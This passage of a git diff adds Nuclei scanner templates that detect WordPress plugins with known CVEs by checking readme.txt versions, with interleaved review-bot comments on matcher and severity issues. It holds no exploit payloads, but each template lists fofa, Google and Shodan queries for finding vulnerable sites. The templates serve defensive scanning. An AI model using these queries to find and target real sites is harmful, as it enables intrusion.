+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 20.8.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53823.yaml b/poc/cve/CVE-2024-53823.yaml
new file mode 100644
index 0000000000..a803c31cb1
--- /dev/null
+++ b/poc/cve/CVE-2024-53823.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53823-ec6e0f4eab04b9728e4dde6ee13b9ace
+
+info:
+ name: >
+ The Plus Addons for Elementor Page Builder Lite <= 5.6.14 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The The Plus Addons for Elementor Page Builder Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 5.6.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e30c6a24-1ec8-4816-b467-c1122b9a8ce1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53823
+ metadata:
+ fofa-query: "wp-content/plugins/the-plus-addons-for-elementor-page-builder/"
+ google-query: inurl:"/wp-content/plugins/the-plus-addons-for-elementor-page-builder/"
+ shodan-query: 'vuln:CVE-2024-53823'
+ tags: cve,wordpress,wp-plugin,the-plus-addons-for-elementor-page-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/the-plus-addons-for-elementor-page-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "the-plus-addons-for-elementor-page-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.6.14')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53824.yaml b/poc/cve/CVE-2024-53824.yaml
new file mode 100644
index 0000000000..e7b5338711
--- /dev/null
+++ b/poc/cve/CVE-2024-53824.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53824-6175e1733e3397fffa8fe7b047e94e55
+
+info:
+ name: >
+ All Bootstrap Blocks <= 1.3.19 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+ The All Bootstrap Blocks plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.3.19. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1b2cf896-7cb8-4a1e-bd8c-4da339965138?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-53824
+ metadata:
+ fofa-query: "wp-content/plugins/all-bootstrap-blocks/"
+ google-query: inurl:"/wp-content/plugins/all-bootstrap-blocks/"
+ shodan-query: 'vuln:CVE-2024-53824'
+ tags: cve,wordpress,wp-plugin,all-bootstrap-blocks,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/all-bootstrap-blocks/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "all-bootstrap-blocks"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.19')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53826.yaml b/poc/cve/CVE-2024-53826.yaml
new file mode 100644
index 0000000000..a504333f13
--- /dev/null
+++ b/poc/cve/CVE-2024-53826.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53826-e1607a5c14986b3d990b221c0149561b
+
+info:
+ name: >
+ WPCasa <= 1.2.13 - Insecure Direct Object Reference
+ author: topscoder
+ severity: medium
+ description: >
+ The WPCasa plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.2.13 due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to act on objects they shouldn't be able to manipulate.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d1e5030-fb78-47da-b571-048b97c9ff9e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-53826
+ metadata:
+ fofa-query: "wp-content/plugins/wpcasa/"
+ google-query: inurl:"/wp-content/plugins/wpcasa/"
+ shodan-query: 'vuln:CVE-2024-53826'
+ tags: cve,wordpress,wp-plugin,wpcasa,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpcasa/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpcasa"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.13')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54206.yaml b/poc/cve/CVE-2024-54206.yaml
new file mode 100644
index 0000000000..e00ffd248e
--- /dev/null
+++ b/poc/cve/CVE-2024-54206.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54206-d592b86b797429244811af87aadde053
+
+info:
+ name: >
+ Z-Downloads <= 1.11.7 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Z-Downloads plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.11.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only impacts multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/aae94aa1-a7a9-43df-b958-4fcf0392335b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-54206
+ metadata:
+ fofa-query: "wp-content/plugins/z-downloads/"
+ google-query: inurl:"/wp-content/plugins/z-downloads/"
+ shodan-query: 'vuln:CVE-2024-54206'
+ tags: cve,wordpress,wp-plugin,z-downloads,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/z-downloads/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "z-downloads"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.11.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54207.yaml b/poc/cve/CVE-2024-54207.yaml
new file mode 100644
index 0000000000..63bf742181
--- /dev/null
+++ b/poc/cve/CVE-2024-54207.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54207-6550e248932e2b5e412bf4389b4db0b2
+
+info:
+ name: >
+ WordPress Auction Plugin <= 3.7 - Authenticated (Editor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WordPress Auction Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6c240829-0672-4ac2-b49a-2068a0a549f1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 5.5
+ cve-id: CVE-2024-54207
+ metadata:
+ fofa-query: "wp-content/plugins/wp-auctions/"
+ google-query: inurl:"/wp-content/plugins/wp-auctions/"
+ shodan-query: 'vuln:CVE-2024-54207'
+ tags: cve,wordpress,wp-plugin,wp-auctions,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-auctions/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-auctions"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54212.yaml b/poc/cve/CVE-2024-54212.yaml
new file mode 100644
index 0000000000..8039acb1e2
--- /dev/null
+++ b/poc/cve/CVE-2024-54212.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54212-d09821a4422849355cacdfed1659a677
+
+info:
+ name: >
+ Magical Addons For Elementor <= 1.2.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Magical Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b421d80f-408e-4fb0-9894-b7e5707d8d5f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-54212
+ metadata:
+ fofa-query: "wp-content/plugins/magical-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/magical-addons-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-54212'
+ tags: cve,wordpress,wp-plugin,magical-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/magical-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "magical-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54213.yaml b/poc/cve/CVE-2024-54213.yaml
new file mode 100644
index 0000000000..174883d6b5
--- /dev/null
+++ b/poc/cve/CVE-2024-54213.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54213-c849bc6412851fdfab9fa6a72e7286ff
+
+info:
+ name: >
+ WordPress Page Builder – Zion Builder <= 3.6.12 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WordPress Page Builder – Zion Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.6.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/870beaba-5294-4a77-89d1-8d5cf92974dc?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-54213
+ metadata:
+ fofa-query: "wp-content/plugins/zionbuilder/"
+ google-query: inurl:"/wp-content/plugins/zionbuilder/"
+ shodan-query: 'vuln:CVE-2024-54213'
+ tags: cve,wordpress,wp-plugin,zionbuilder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/zionbuilder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "zionbuilder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.12')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54214.yaml b/poc/cve/CVE-2024-54214.yaml
new file mode 100644
index 0000000000..60908bae6a
--- /dev/null
+++ b/poc/cve/CVE-2024-54214.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54214-62204c0e75824c81aacf42c7b2c3ef67
+
+info:
+ name: >
+ Revy <= 1.18 - Unauthenticated Arbitrary File Upload
+ author: topscoder
+ severity: critical
+ description: >
+ The Revy plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.18. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6827dc47-669c-41de-8716-7932ce8e5259?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2024-54214
+ metadata:
+ fofa-query: "wp-content/plugins/revy/"
+ google-query: inurl:"/wp-content/plugins/revy/"
+ shodan-query: 'vuln:CVE-2024-54214'
+ tags: cve,wordpress,wp-plugin,revy,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/revy/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "revy"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.18')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54215.yaml b/poc/cve/CVE-2024-54215.yaml
new file mode 100644
index 0000000000..22a01df6c1
--- /dev/null
+++ b/poc/cve/CVE-2024-54215.yaml
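Review bot: The word matcher `- "revy"` in CVE-2024-54214.yaml is a bare lowercase slug, and word matchers compare case-sensitively unless told otherwise, so this critical-rated check may stay silent on a readme that only spells the name `Revy`. The request path is already plugin-specific and the dsl matcher needs a `Stable tag:` line, so the word adds little precision while it can cost recall. I would add `case-insensitive: true` to this matcher. CVE-2024-54215.yaml uses the same matcher, and the slug-based word matchers in the other templates here depend in the same way on the readme containing the exact lowercase slug.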
@@ -0,0 +1,59 @@
+id: CVE-2024-54215-eb6c568774fac21c9e0fd876c8c18c48
+
+info:
+ name: >
+ Revy <= 1.18 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The Revy plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.18 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/50192909-9351-4cf5-b578-f34be72aeda6?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-54215
+ metadata:
+ fofa-query: "wp-content/plugins/revy/"
+ google-query: inurl:"/wp-content/plugins/revy/"
+ shodan-query: 'vuln:CVE-2024-54215'
+ tags: cve,wordpress,wp-plugin,revy,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/revy/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "revy"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.18')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54216.yaml b/poc/cve/CVE-2024-54216.yaml
new file mode 100644
index 0000000000..2045ba197c
--- /dev/null
+++ b/poc/cve/CVE-2024-54216.yaml
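Review bot: `severity: critical` in CVE-2024-54215.yaml is higher than the `cvss-score: 7.5` in its own `classification` block, which falls in the High band (7.0–8.9) of CVSS v3.1; the `critical` entry in `tags` carries the same value. Over-rating matters as much as under-rating, because it pushes this finding ahead of genuinely critical ones in a severity-sorted queue. I would change both to `high`. CVE-2024-54218.yaml has the same kind of mismatch, with `severity: high` next to `cvss-score: 6.5`, which is Medium.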
@@ -0,0 +1,59 @@
+id: CVE-2024-54216-5024750a9504fe312f75e6f67ba9c71d
+
+info:
+ name: >
+ ARForms <= 6.4.1 - Directory Traversal to Authenticated (Subscriber+) Arbitrary File Read
+ author: topscoder
+ severity: low
+ description: >
+ The ARforms plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 6.4.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read arbitrary files on the server, which can expose DB credentials when the wp-config.php file is read.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0f02b258-d911-401e-8b32-57166d75bde7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 7.7
+ cve-id: CVE-2024-54216
+ metadata:
+ fofa-query: "wp-content/plugins/arforms/"
+ google-query: inurl:"/wp-content/plugins/arforms/"
+ shodan-query: 'vuln:CVE-2024-54216'
+ tags: cve,wordpress,wp-plugin,arforms,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/arforms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "arforms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.4.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54217.yaml b/poc/cve/CVE-2024-54217.yaml
new file mode 100644
index 0000000000..371a7a3d70
--- /dev/null
+++ b/poc/cve/CVE-2024-54217.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54217-313ad197c9d2d51af932f72d31a189fa
+
+info:
+ name: >
+ ARForms <= 6.4.1 - Missing Authorization to Plugin Settings Change
+ author: topscoder
+ severity: low
+ description: >
+ The ARforms plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check in all versions up to, and including, 6.4.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the plugin's settings.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d5d12ecc-862f-4ecd-9c7b-25dc557abb8d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
+ cvss-score: 5.4
+ cve-id: CVE-2024-54217
+ metadata:
+ fofa-query: "wp-content/plugins/arforms/"
+ google-query: inurl:"/wp-content/plugins/arforms/"
+ shodan-query: 'vuln:CVE-2024-54217'
+ tags: cve,wordpress,wp-plugin,arforms,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/arforms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "arforms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.4.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54218.yaml b/poc/cve/CVE-2024-54218.yaml
new file mode 100644
index 0000000000..87fbb9380d
--- /dev/null
+++ b/poc/cve/CVE-2024-54218.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54218-06b4afe7f8ad8e989e59bbb3cdd989da
+
+info:
+ name: >
+ AIO Contact <= 2.8.1 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+ The AIO Contact plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.8.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3d8f722f-79be-4df2-9f91-e759b8a73277?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
+ cvss-score: 6.5
+ cve-id: CVE-2024-54218
+ metadata:
+ fofa-query: "wp-content/plugins/aio-contact/"
+ google-query: inurl:"/wp-content/plugins/aio-contact/"
+ shodan-query: 'vuln:CVE-2024-54218'
+ tags: cve,wordpress,wp-plugin,aio-contact,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/aio-contact/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "aio-contact"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54219.yaml b/poc/cve/CVE-2024-54219.yaml
new file mode 100644
index 0000000000..ee5f19e6de
--- /dev/null
+++ b/poc/cve/CVE-2024-54219.yaml
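Review bot: The template carries no comment saying that a match is only a version inference: the three entries under `matchers:` check for a 200 response, the slug string, and a `Stable tag` in readme.txt at or below 2.8.1, and nothing touches the missing capability check the description refers to. A readme with `Stable tag: trunk`, or a site where readme.txt was removed, produces no result at all, and the advertised stable tag may differ from the installed version. I would add above `http:` the comment `# Version check on readme.txt only; confirm the installed plugin version before reporting.` The same applies to the other templates in these hunks.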
@@ -0,0 +1,59 @@
+id: CVE-2024-54219-0c95674ba25b17f5866c5401fb53b69f
+
+info:
+ name: >
+ AIO Contact <= 2.8.1 - Unauthenticated Stored Cross-Site Scripting
+ author: topscoder
+ severity: high
+ description: >
+ The AIO Contact plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.8.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e4c7d179-9b65-48da-b92e-11fb0629653a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cve-id: CVE-2024-54219
+ metadata:
+ fofa-query: "wp-content/plugins/aio-contact/"
+ google-query: inurl:"/wp-content/plugins/aio-contact/"
+ shodan-query: 'vuln:CVE-2024-54219'
+ tags: cve,wordpress,wp-plugin,aio-contact,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/aio-contact/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "aio-contact"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54220.yaml b/poc/cve/CVE-2024-54220.yaml
new file mode 100644
index 0000000000..d13efe5130
--- /dev/null
+++ b/poc/cve/CVE-2024-54220.yaml
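Review bot: The two entries under `extractors:` run the same regex under the same `name: version` and differ only in `internal: true`, and nothing says why both are there. Presumably the internal one feeds `compare_versions(version, ...)` in the dsl matcher and the second prints the version in the scan result; a comment on each, such as `# internal: value for the dsl matcher` and `# reported: shown in scan output`, would keep a later cleanup from deleting one of them. The pattern repeats in every template in these hunks.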
@@ -0,0 +1,59 @@
+id: CVE-2024-54220-dabc3c346f24f802d453a828795d331c
+
+info:
+ name: >
+ FAT Services Booking <= 5.6 - Authenticated (Subscriber+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The FAT Services Booking plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b03125e6-689b-46d7-8a39-3260d46fb17d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-54220
+ metadata:
+ fofa-query: "wp-content/plugins/fat-services-booking/"
+ google-query: inurl:"/wp-content/plugins/fat-services-booking/"
+ shodan-query: 'vuln:CVE-2024-54220'
+ tags: cve,wordpress,wp-plugin,fat-services-booking,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fat-services-booking/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "fat-services-booking"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54221.yaml b/poc/cve/CVE-2024-54221.yaml
new file mode 100644
index 0000000000..68a2869388
--- /dev/null
+++ b/poc/cve/CVE-2024-54221.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54221-6ec2fd6753d862f4960591e64ef3b6c9
+
+info:
+ name: >
+ FAT Services Booking <= 5.6 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
